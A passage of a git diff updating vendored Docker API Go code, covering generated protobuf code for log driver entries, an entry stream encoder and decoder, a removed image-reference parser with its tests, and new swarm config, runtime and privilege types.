+				return fmt.Errorf("proto: wrong wireType = %d for field Line", wireType)
+			}
+			var byteLen int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				byteLen |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			if byteLen < 0 {
+				return ErrInvalidLengthEntry
+			}
+			postIndex := iNdEx + byteLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Line = append(m.Line[:0], dAtA[iNdEx:postIndex]...)
+			if m.Line == nil {
+				m.Line = []byte{}
+			}
+			iNdEx = postIndex
+		case 4:
+			if wireType != 0 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Partial", wireType)
+			}
+			var v int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				v |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			m.Partial = bool(v != 0)
+		default:
+			iNdEx = preIndex
+			skippy, err := skipEntry(dAtA[iNdEx:])
+			if err != nil {
+				return err
+			}
+			if skippy < 0 {
+				return ErrInvalidLengthEntry
+			}
+			if (iNdEx + skippy) > l {
+				return io.ErrUnexpectedEOF
+			}
+			iNdEx += skippy
+		}
+	}
+
+	if iNdEx > l {
+		return io.ErrUnexpectedEOF
+	}
+	return nil
+}
+func skipEntry(dAtA []byte) (n int, err error) {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return 0, ErrIntOverflowEntry
+			}
+			if iNdEx >= l {
+				return 0, io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		wireType := int(wire & 0x7)
+		switch wireType {
+		case 0:
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				iNdEx++
+				if dAtA[iNdEx-1] < 0x80 {
+					break
+				}
+			}
+			return iNdEx, nil
+		case 1:
+			iNdEx += 8
+			return iNdEx, nil
+		case 2:
+			var length int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				length |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			iNdEx += length
+			if length < 0 {
+				return 0, ErrInvalidLengthEntry
+			}
+			return iNdEx, nil
+		case 3:
+			for {
+				var innerWire uint64
+				var start int = iNdEx
+				for shift := uint(0); ; shift += 7 {
+					if shift >= 64 {
+						return 0, ErrIntOverflowEntry
+					}
+					if iNdEx >= l {
+						return 0, io.ErrUnexpectedEOF
+					}
+					b := dAtA[iNdEx]
+					iNdEx++
+					innerWire |= (uint64(b) & 0x7F) << shift
+					if b < 0x80 {
+						break
+					}
+				}
+				innerWireType := int(innerWire & 0x7)
+				if innerWireType == 4 {
+					break
+				}
+				next, err := skipEntry(dAtA[start:])
+				if err != nil {
+					return 0, err
+				}
+				iNdEx = start + next
+			}
+			return iNdEx, nil
+		case 4:
+			return iNdEx, nil
+		case 5:
+			iNdEx += 4
+			return iNdEx, nil
+		default:
+			return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
+		}
+	}
+	panic("unreachable")
+}
+
+var (
+	ErrInvalidLengthEntry = fmt.Errorf("proto: negative length found during unmarshaling")
+	ErrIntOverflowEntry   = fmt.Errorf("proto: integer overflow")
+)
+
+func init() { proto.RegisterFile("entry.proto", fileDescriptorEntry) }
+
+var fileDescriptorEntry = []byte{
+	// 149 bytes of a gzipped FileDescriptorProto
+	0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x4e, 0xcd, 0x2b, 0x29,
+	0xaa, 0xd4, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x57, 0xca, 0xe5, 0xe2, 0xf0, 0xc9, 0x4f, 0x77, 0x05,
+	0x89, 0x08, 0x89, 0x71, 0xb1, 0x15, 0xe7, 0x97, 0x16, 0x25, 0xa7, 0x4a, 0x30, 0x2a, 0x30, 0x6a,
+	0x70, 0x06, 0x41, 0x79, 0x42, 0xd2, 0x5c, 0x9c, 0x25, 0x99, 0xb9, 0xa9, 0xf1, 0x79, 0x89, 0x79,
+	0xf9, 0x12, 0x4c, 0x0a, 0x8c, 0x1a, 0xcc, 0x41, 0x1c, 0x20, 0x01, 0xbf, 0xc4, 0xbc, 0x7c, 0x21,
+	0x21, 0x2e, 0x96, 0x9c, 0xcc, 0xbc, 0x54, 0x09, 0x66, 0x05, 0x46, 0x0d, 0x9e, 0x20, 0x30, 0x5b,
+	0x48, 0x82, 0x8b, 0xbd, 0x20, 0xb1, 0xa8, 0x24, 0x33, 0x31, 0x47, 0x82, 0x45, 0x81, 0x51, 0x83,
+	0x23, 0x08, 0xc6, 0x75, 0xe2, 0x39, 0xf1, 0x48, 0x8e, 0xf1, 0xc2, 0x23, 0x39, 0xc6, 0x07, 0x8f,
+	0xe4, 0x18, 0x93, 0xd8, 0xc0, 0x6e, 0x30, 0x06, 0x04, 0x00, 0x00, 0xff, 0xff, 0x2d, 0x24, 0x5a,
+	0xd4, 0x92, 0x00, 0x00, 0x00,
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto b/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto
new file mode 100644
index 0000000000..a4e96ea5f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto
@@ -0,0 +1,8 @@
+syntax = "proto3";
+
+message LogEntry {
+	string source = 1;
+	int64 time_nano = 2;
+	bytes line = 3;
+	bool partial = 4;
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go b/vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go
new file mode 100644
index 0000000000..e5f10b5e0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go
@@ -0,0 +1,3 @@
+//go:generate protoc --gogofast_out=import_path=github.com/docker/docker/api/types/plugins/logdriver:. entry.proto
+
+package logdriver // import "github.com/docker/docker/api/types/plugins/logdriver"
diff --git a/vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go b/vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go
new file mode 100644
index 0000000000..9081b3b45f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go
@@ -0,0 +1,87 @@
+package logdriver // import "github.com/docker/docker/api/types/plugins/logdriver"
+
+import (
+	"encoding/binary"
+	"io"
+)
+
+const binaryEncodeLen = 4
+
+// LogEntryEncoder encodes a LogEntry to a protobuf stream
+// The stream should look like:
+//
+// [uint32 binary encoded message size][protobuf message]
+//
+// To decode an entry, read the first 4 bytes to get the size of the entry,
+// then read `size` bytes from the stream.
+type LogEntryEncoder interface {
+	Encode(*LogEntry) error
+}
+
+// NewLogEntryEncoder creates a protobuf stream encoder for log entries.
+// This is used to write out  log entries to a stream.
+func NewLogEntryEncoder(w io.Writer) LogEntryEncoder {
+	return &logEntryEncoder{
+		w:   w,
+		buf: make([]byte, 1024),
+	}
+}
+
+type logEntryEncoder struct {
+	buf []byte
+	w   io.Writer
+}
+
+func (e *logEntryEncoder) Encode(l *LogEntry) error {
+	n := l.Size()
+
+	total := n + binaryEncodeLen
+	if total > len(e.buf) {
+		e.buf = make([]byte, total)
+	}
+	binary.BigEndian.PutUint32(e.buf, uint32(n))
+
+	if _, err := l.MarshalTo(e.buf[binaryEncodeLen:]); err != nil {
+		return err
+	}
+	_, err := e.w.Write(e.buf[:total])
+	return err
+}
+
+// LogEntryDecoder decodes log entries from a stream
+// It is expected that the wire format is as defined by LogEntryEncoder.
+type LogEntryDecoder interface {
+	Decode(*LogEntry) error
+}
+
+// NewLogEntryDecoder creates a new stream decoder for log entries
+func NewLogEntryDecoder(r io.Reader) LogEntryDecoder {
+	return &logEntryDecoder{
+		lenBuf: make([]byte, binaryEncodeLen),
+		buf:    make([]byte, 1024),
+		r:      r,
+	}
+}
+
+type logEntryDecoder struct {
+	r      io.Reader
+	lenBuf []byte
+	buf    []byte
+}
+
+func (d *logEntryDecoder) Decode(l *LogEntry) error {
+	_, err := io.ReadFull(d.r, d.lenBuf)
+	if err != nil {
+		return err
+	}
+
+	size := int(binary.BigEndian.Uint32(d.lenBuf))
+	if len(d.buf) < size {
+		d.buf = make([]byte, size)
+	}
+
+	if _, err := io.ReadFull(d.r, d.buf[:size]); err != nil {
+		return err
+	}
+	return l.Unmarshal(d.buf[:size])
+}
diff --git a/vendor/github.com/docker/docker/api/types/port.go b/vendor/github.com/docker/docker/api/types/port.go
index ad52d46d56..d91234744c 100644
--- a/vendor/github.com/docker/docker/api/types/port.go
+++ b/vendor/github.com/docker/docker/api/types/port.go
@@ -7,7 +7,7 @@ package types
 // swagger:model Port
 type Port struct {
 
-	// IP
+	// Host IP address that the container's port is mapped to
 	IP string `json:"IP,omitempty"`
 
 	// Port on the container
diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference.go b/vendor/github.com/docker/docker/api/types/reference/image_reference.go
deleted file mode 100644
index be9cf8ebed..0000000000
--- a/vendor/github.com/docker/docker/api/types/reference/image_reference.go
+++ /dev/null
@@ -1,34 +0,0 @@
-package reference
-
-import (
-	distreference "github.com/docker/distribution/reference"
-)
-
-// Parse parses the given references and returns the repository and
-// tag (if present) from it. If there is an error during parsing, it will
-// return an error.
-func Parse(ref string) (string, string, error) {
-	distributionRef, err := distreference.ParseNamed(ref)
-	if err != nil {
-		return "", "", err
-	}
-
-	tag := GetTagFromNamedRef(distributionRef)
-	return distributionRef.Name(), tag, nil
-}
-
-// GetTagFromNamedRef returns a tag from the specified reference.
-// This function is necessary as long as the docker "server" api makes the distinction between repository
-// and tags.
-func GetTagFromNamedRef(ref distreference.Named) string {
-	var tag string
-	switch x := ref.(type) {
-	case distreference.Digested:
-		tag = x.Digest().String()
-	case distreference.NamedTagged:
-		tag = x.Tag()
-	default:
-		tag = "latest"
-	}
-	return tag
-}
diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
deleted file mode 100644
index 61fb676b6c..0000000000
--- a/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go
+++ /dev/null
@@ -1,72 +0,0 @@
-package reference
-
-import (
-	"testing"
-)
-
-func TestParse(t *testing.T) {
-	testCases := []struct {
-		ref           string
-		expectedName  string
-		expectedTag   string
-		expectedError bool
-	}{
-		{
-			ref:           "",
-			expectedName:  "",
-			expectedTag:   "",
-			expectedError: true,
-		},
-		{
-			ref:           "repository",
-			expectedName:  "repository",
-			expectedTag:   "latest",
-			expectedError: false,
-		},
-		{
-			ref:           "repository:tag",
-			expectedName:  "repository",
-			expectedTag:   "tag",
-			expectedError: false,
-		},
-		{
-			ref:           "test.com/repository",
-			expectedName:  "test.com/repository",
-			expectedTag:   "latest",
-			expectedError: false,
-		},
-		{
-			ref:           "test.com:5000/test/repository",
-			expectedName:  "test.com:5000/test/repository",
-			expectedTag:   "latest",
-			expectedError: false,
-		},
-		{
-			ref:           "test.com:5000/repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
-			expectedName:  "test.com:5000/repo",
-			expectedTag:   "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
-			expectedError: false,
-		},
-		{
-			ref:           "test.com:5000/repo:tag@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
-			expectedName:  "test.com:5000/repo",
-			expectedTag:   "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
-			expectedError: false,
-		},
-	}
-
-	for _, c := range testCases {
-		name, tag, err := Parse(c.ref)
-		if err != nil && c.expectedError {
-			continue
-		} else if err != nil {
-			t.Fatalf("error with %s: %s", c.ref, err.Error())
-		}
-		if name != c.expectedName {
-			t.Fatalf("expected name %s, got %s", c.expectedName, name)
-		}
-		if tag != c.expectedTag {
-			t.Fatalf("expected tag %s, got %s", c.expectedTag, tag)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/api/types/registry/authenticate.go b/vendor/github.com/docker/docker/api/types/registry/authenticate.go
index 5e37d19bd4..f0a2113e40 100644
--- a/vendor/github.com/docker/docker/api/types/registry/authenticate.go
+++ b/vendor/github.com/docker/docker/api/types/registry/authenticate.go
@@ -1,10 +1,10 @@
-package registry
+package registry // import "github.com/docker/docker/api/types/registry"
 
 // ----------------------------------------------------------------------------
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
 // AuthenticateOKBody authenticate o k body
diff --git a/vendor/github.com/docker/docker/api/types/registry/registry.go b/vendor/github.com/docker/docker/api/types/registry/registry.go
index 28fafab901..8789ad3b32 100644
--- a/vendor/github.com/docker/docker/api/types/registry/registry.go
+++ b/vendor/github.com/docker/docker/api/types/registry/registry.go
@@ -1,15 +1,19 @@
-package registry
+package registry // import "github.com/docker/docker/api/types/registry"
 
 import (
 	"encoding/json"
 	"net"
+
+	"github.com/opencontainers/image-spec/specs-go/v1"
 )
 
 // ServiceConfig stores daemon registry services configuration.
 type ServiceConfig struct {
-	InsecureRegistryCIDRs []*NetIPNet           `json:"InsecureRegistryCIDRs"`
-	IndexConfigs          map[string]*IndexInfo `json:"IndexConfigs"`
-	Mirrors               []string
+	AllowNondistributableArtifactsCIDRs     []*NetIPNet
+	AllowNondistributableArtifactsHostnames []string
+	InsecureRegistryCIDRs                   []*NetIPNet           `json:"InsecureRegistryCIDRs"`
+	IndexConfigs                            map[string]*IndexInfo `json:"IndexConfigs"`
+	Mirrors                                 []string
 }
 
 // NetIPNet is the net.IPNet type, which can be marshalled and
@@ -102,3 +106,14 @@ type SearchResults struct {
 	// Results is a slice containing the actual results for the search
 	Results []SearchResult `json:"results"`
 }
+
+// DistributionInspect describes the result obtained from contacting the
+// registry to retrieve image metadata
+type DistributionInspect struct {
+	// Descriptor contains information about the manifest, including
+	// the content addressable digest
+	Descriptor v1.Descriptor
+	// Platforms contains the list of platforms supported by the image,
+	// obtained by parsing the manifest
+	Platforms []v1.Platform
+}
diff --git a/vendor/github.com/docker/docker/api/types/seccomp.go b/vendor/github.com/docker/docker/api/types/seccomp.go
index 4f02ef36b8..67a41e1a89 100644
--- a/vendor/github.com/docker/docker/api/types/seccomp.go
+++ b/vendor/github.com/docker/docker/api/types/seccomp.go
@@ -1,4 +1,4 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 // Seccomp represents the config for a seccomp profile for syscall restriction.
 type Seccomp struct {
@@ -10,7 +10,7 @@ type Seccomp struct {
 	Syscalls      []*Syscall     `json:"syscalls"`
 }
 
-// Architecture is used to represent an specific architecture
+// Architecture is used to represent a specific architecture
 // and its sub-architectures
 type Architecture struct {
 	Arch      Arch   `json:"architecture"`
diff --git a/vendor/github.com/docker/docker/api/types/stats.go b/vendor/github.com/docker/docker/api/types/stats.go
index 9bf1928b8c..60175c0613 100644
--- a/vendor/github.com/docker/docker/api/types/stats.go
+++ b/vendor/github.com/docker/docker/api/types/stats.go
@@ -1,6 +1,6 @@
 // Package types is used for API stability in the types and response to the
 // consumers of the API stats endpoint.
-package types
+package types // import "github.com/docker/docker/api/types"
 
 import "time"
 
@@ -47,6 +47,9 @@ type CPUStats struct {
 	// System Usage. Linux only.
 	SystemUsage uint64 `json:"system_cpu_usage,omitempty"`
 
+	// Online CPUs. Linux only.
+	OnlineCPUs uint32 `json:"online_cpus,omitempty"`
+
 	// Throttling Data. Linux only.
 	ThrottlingData ThrottlingData `json:"throttling_data,omitempty"`
 }
diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice.go b/vendor/github.com/docker/docker/api/types/strslice/strslice.go
index bad493fb89..82921cebc1 100644
--- a/vendor/github.com/docker/docker/api/types/strslice/strslice.go
+++ b/vendor/github.com/docker/docker/api/types/strslice/strslice.go
@@ -1,4 +1,4 @@
-package strslice
+package strslice // import "github.com/docker/docker/api/types/strslice"
 
 import "encoding/json"
 
diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
index 1163b3652c..a065eb5551 100644
--- a/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
+++ b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
@@ -1,4 +1,4 @@
-package strslice
+package strslice // import "github.com/docker/docker/api/types/strslice"
 
 import (
 	"encoding/json"
diff --git a/vendor/github.com/docker/docker/api/types/swarm/common.go b/vendor/github.com/docker/docker/api/types/swarm/common.go
index 64a648bad1..ef020f458b 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/common.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/common.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 import "time"
 
@@ -17,11 +17,24 @@ type Meta struct {
 // Annotations represents how to describe an object.
 type Annotations struct {
 	Name   string            `json:",omitempty"`
-	Labels map[string]string `json:",omitempty"`
+	Labels map[string]string `json:"Labels"`
 }
 
-// Driver represents a driver (network, logging).
+// Driver represents a driver (network, logging, secrets backend).
 type Driver struct {
 	Name    string            `json:",omitempty"`
 	Options map[string]string `json:",omitempty"`
 }
+
+// TLSInfo represents the TLS information about what CA certificate is trusted,
+// and who the issuer for a TLS certificate is
+type TLSInfo struct {
+	// TrustRoot is the trusted CA root certificate in PEM format
+	TrustRoot string `json:",omitempty"`
+
+	// CertIssuer is the raw subject bytes of the issuer
+	CertIssuerSubject []byte `json:",omitempty"`
+
+	// CertIssuerPublicKey is the raw public key bytes of the issuer
+	CertIssuerPublicKey []byte `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/config.go b/vendor/github.com/docker/docker/api/types/swarm/config.go
new file mode 100644
index 0000000000..a1555cf43e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/config.go
@@ -0,0 +1,35 @@
+package swarm // import "github.com/docker/docker/api/types/swarm"
+
+import "os"
+
+// Config represents a config.
+type Config struct {
+	ID string
+	Meta
+	Spec ConfigSpec
+}
+
+// ConfigSpec represents a config specification from a config in swarm
+type ConfigSpec struct {
+	Annotations
+	Data []byte `json:",omitempty"`
+
+	// Templating controls whether and how to evaluate the config payload as
+	// a template. If it is not set, no templating is used.
+	Templating *Driver `json:",omitempty"`
+}
+
+// ConfigReferenceFileTarget is a file target in a config reference
+type ConfigReferenceFileTarget struct {
+	Name string
+	UID  string
+	GID  string
+	Mode os.FileMode
+}
+
+// ConfigReference is a reference to a config in swarm
+type ConfigReference struct {
+	File       *ConfigReferenceFileTarget
+	ConfigID   string
+	ConfigName string
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/container.go b/vendor/github.com/docker/docker/api/types/swarm/container.go
index 4ab476ccc3..151211ff5a 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/container.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/container.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 import (
 	"time"
@@ -21,6 +21,28 @@ type DNSConfig struct {
 	Options []string `json:",omitempty"`
 }
 
+// SELinuxContext contains the SELinux labels of the container.
+type SELinuxContext struct {
+	Disable bool
+
+	User  string
+	Role  string
+	Type  string
+	Level string
+}
+
+// CredentialSpec for managed service account (Windows only)
+type CredentialSpec struct {
+	File     string
+	Registry string
+}
+
+// Privileges defines the security options for the container.
+type Privileges struct {
+	CredentialSpec *CredentialSpec
+	SELinuxContext *SELinuxContext
+}
+
 // ContainerSpec represents the spec of a container.
 type ContainerSpec struct {
 	Image           string                  `json:",omitempty"`
@@ -32,15 +54,21 @@ type ContainerSpec struct {
 	Dir             string                  `json:",omitempty"`
 	User            string                  `json:",omitempty"`
 	Groups          []string                `json:",omitempty"`
+	Privileges      *Privileges             `json:",omitempty"`
+	Init            *bool                   `json:",omitempty"`
+	StopSignal      string                  `json:",omitempty"`
 	TTY             bool                    `json:",omitempty"`
 	OpenStdin       bool                    `json:",omitempty"`
+	ReadOnly        bool                    `json:",omitempty"`
 	Mounts          []mount.Mount           `json:",omitempty"`
 	StopGracePeriod *time.Duration          `json:",omitempty"`
 	Healthcheck     *container.HealthConfig `json:",omitempty"`
 	// The format of extra hosts on swarmkit is specified in:
 	// http://man7.org/linux/man-pages/man5/hosts.5.html
 	//    IP_address canonical_hostname [aliases...]
-	Hosts     []string           `json:",omitempty"`
-	DNSConfig *DNSConfig         `json:",omitempty"`
-	Secrets   []*SecretReference `json:",omitempty"`
+	Hosts     []string            `json:",omitempty"`
+	DNSConfig *DNSConfig          `json:",omitempty"`
+	Secrets   []*SecretReference  `json:",omitempty"`
+	Configs   []*ConfigReference  `json:",omitempty"`
+	Isolation container.Isolation `json:",omitempty"`
 }
diff --git a/vendor/github.com/docker/docker/api/types/swarm/network.go b/vendor/github.com/docker/docker/api/types/swarm/network.go
index 5a5e11bdba..98ef3284d1 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/network.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/network.go
@@ -1,4 +1,8 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
+
+import (
+	"github.com/docker/docker/api/types/network"
+)
 
 // Endpoint represents an endpoint.
 type Endpoint struct {
@@ -58,6 +62,8 @@ const (
 	PortConfigProtocolTCP PortConfigProtocol = "tcp"
 	// PortConfigProtocolUDP UDP
 	PortConfigProtocolUDP PortConfigProtocol = "udp"
+	// PortConfigProtocolSCTP SCTP
+	PortConfigProtocolSCTP PortConfigProtocol = "sctp"
 )
 
 // EndpointVirtualIP represents the virtual ip of a port.
@@ -78,17 +84,21 @@ type Network struct {
 // NetworkSpec represents the spec of a network.
 type NetworkSpec struct {
 	Annotations
-	DriverConfiguration *Driver      `json:",omitempty"`
-	IPv6Enabled         bool         `json:",omitempty"`
-	Internal            bool         `json:",omitempty"`
-	Attachable          bool         `json:",omitempty"`
-	IPAMOptions         *IPAMOptions `json:",omitempty"`
+	DriverConfiguration *Driver                  `json:",omitempty"`
+	IPv6Enabled         bool                     `json:",omitempty"`
+	Internal            bool                     `json:",omitempty"`
+	Attachable          bool                     `json:",omitempty"`
+	Ingress             bool                     `json:",omitempty"`
+	IPAMOptions         *IPAMOptions             `json:",omitempty"`
+	ConfigFrom          *network.ConfigReference `json:",omitempty"`
+	Scope               string                   `json:",omitempty"`
 }
 
 // NetworkAttachmentConfig represents the configuration of a network attachment.
 type NetworkAttachmentConfig struct {
-	Target  string   `json:",omitempty"`
-	Aliases []string `json:",omitempty"`
+	Target     string            `json:",omitempty"`
+	Aliases    []string          `json:",omitempty"`
+	DriverOpts map[string]string `json:",omitempty"`
 }
 
 // NetworkAttachment represents a network attachment.
diff --git a/vendor/github.com/docker/docker/api/types/swarm/node.go b/vendor/github.com/docker/docker/api/types/swarm/node.go
index 379e17a779..1e30f5fa10 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/node.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/node.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 // Node represents a node.
 type Node struct {
@@ -52,6 +52,7 @@ type NodeDescription struct {
 	Platform  Platform          `json:",omitempty"`
 	Resources Resources         `json:",omitempty"`
 	Engine    EngineDescription `json:",omitempty"`
+	TLSInfo   TLSInfo           `json:",omitempty"`
 }
 
 // Platform represents the platform (Arch/OS).
diff --git a/vendor/github.com/docker/docker/api/types/swarm/runtime.go b/vendor/github.com/docker/docker/api/types/swarm/runtime.go
new file mode 100644
index 0000000000..0c77403ccf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/runtime.go
@@ -0,0 +1,27 @@
+package swarm // import "github.com/docker/docker/api/types/swarm"
+
+// RuntimeType is the type of runtime used for the TaskSpec
+type RuntimeType string
+
+// RuntimeURL is the proto type url
+type RuntimeURL string
+
+const (
+	// RuntimeContainer is the container based runtime
+	RuntimeContainer RuntimeType = "container"
+	// RuntimePlugin is the plugin based runtime
+	RuntimePlugin RuntimeType = "plugin"
+	// RuntimeNetworkAttachment is the network attachment runtime
+	RuntimeNetworkAttachment RuntimeType = "attachment"
+
+	// RuntimeURLContainer is the proto url for the container type
+	RuntimeURLContainer RuntimeURL = "types.docker.com/RuntimeContainer"
+	// RuntimeURLPlugin is the proto url for the plugin type
+	RuntimeURLPlugin RuntimeURL = "types.docker.com/RuntimePlugin"
+)
+
+// NetworkAttachmentSpec represents the runtime spec type for network
+// attachment tasks
+type NetworkAttachmentSpec struct {
+	ContainerID string
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go b/vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go
new file mode 100644
index 0000000000..98c2806c31
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go
@@ -0,0 +1,3 @@
+//go:generate protoc -I . --gogofast_out=import_path=github.com/docker/docker/api/types/swarm/runtime:. plugin.proto
+
+package runtime // import "github.com/docker/docker/api/types/swarm/runtime"
diff --git a/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go b/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go
new file mode 100644
index 0000000000..1fdc9b0436
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go
@@ -0,0 +1,712 @@
+// Code generated by protoc-gen-gogo.
+// source: plugin.proto
+// DO NOT EDIT!
+
+/*
+	Package runtime is a generated protocol buffer package.
+
+	It is generated from these files:
+		plugin.proto
+
+	It has these top-level messages:
+		PluginSpec
+		PluginPrivilege
+*/
+package runtime
+
+import proto "github.com/gogo/protobuf/proto"
+import fmt "fmt"
+import math "math"
+
+import io "io"
+
+// Reference imports to suppress errors if they are not otherwise used.
+var _ = proto.Marshal
+var _ = fmt.Errorf
+var _ = math.Inf
+
+// This is a compile-time assertion to ensure that this generated file
+// is compatible with the proto package it is being compiled against.
+// A compilation error at this line likely means your copy of the
+// proto package needs to be updated.
+const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
+
+// PluginSpec defines the base payload which clients can specify for creating
+// a service with the plugin runtime.
+type PluginSpec struct {
+	Name       string             `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
+	Remote     string             `protobuf:"bytes,2,opt,name=remote,proto3" json:"remote,omitempty"`
+	Privileges []*PluginPrivilege `protobuf:"bytes,3,rep,name=privileges" json:"privileges,omitempty"`
+	Disabled   bool               `protobuf:"varint,4,opt,name=disabled,proto3" json:"disabled,omitempty"`
+}
+
+func (m *PluginSpec) Reset()                    { *m = PluginSpec{} }
+func (m *PluginSpec) String() string            { return proto.CompactTextString(m) }
+func (*PluginSpec) ProtoMessage()               {}
+func (*PluginSpec) Descriptor() ([]byte, []int) { return fileDescriptorPlugin, []int{0} }
+
+func (m *PluginSpec) GetName() string {
+	if m != nil {
+		return m.Name
+	}
+	return ""
+}
+
+func (m *PluginSpec) GetRemote() string {
+	if m != nil {
+		return m.Remote
+	}
+	return ""
+}
+
+func (m *PluginSpec) GetPrivileges() []*PluginPrivilege {
+	if m != nil {
+		return m.Privileges
+	}
+	return nil
+}
+
+func (m *PluginSpec) GetDisabled() bool {
+	if m != nil {
+		return m.Disabled
+	}
+	return false
+}
+
+// PluginPrivilege describes a permission the user has to accept
+// upon installing a plugin.
+type PluginPrivilege struct {
+	Name        string   `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
+	Description string   `protobuf:"bytes,2,opt,name=description,proto3" json:"description,omitempty"`
+	Value       []string `protobuf:"bytes,3,rep,name=value" json:"value,omitempty"`
+}
+
+func (m *PluginPrivilege) Reset()                    { *m = PluginPrivilege{} }
+func (m *PluginPrivilege) String() string            { return proto.CompactTextString(m) }
+func (*PluginPrivilege) ProtoMessage()               {}
+func (*PluginPrivilege) Descriptor() ([]byte, []int) { return fileDescriptorPlugin, []int{1} }
+
+func (m *PluginPrivilege) GetName() string {
+	if m != nil {
+		return m.Name
+	}
+	return ""
+}
+
+func (m *PluginPrivilege) GetDescription() string {
+	if m != nil {
+		return m.Description
+	}
+	return ""
+}
+
+func (m *PluginPrivilege) GetValue() []string {
+	if m != nil {
+		return m.Value
+	}
+	return nil
+}
+
+func init() {
+	proto.RegisterType((*PluginSpec)(nil), "PluginSpec")
+	proto.RegisterType((*PluginPrivilege)(nil), "PluginPrivilege")
+}
+func (m *PluginSpec) Marshal() (dAtA []byte, err error) {
+	size := m.Size()
+	dAtA = make([]byte, size)
+	n, err := m.MarshalTo(dAtA)
+	if err != nil {
+		return nil, err
+	}
+	return dAtA[:n], nil
+}
+
+func (m *PluginSpec) MarshalTo(dAtA []byte) (int, error) {
+	var i int
+	_ = i
+	var l int
+	_ = l
+	if len(m.Name) > 0 {
+		dAtA[i] = 0xa
+		i++
+		i = encodeVarintPlugin(dAtA, i, uint64(len(m.Name)))
+		i += copy(dAtA[i:], m.Name)
+	}
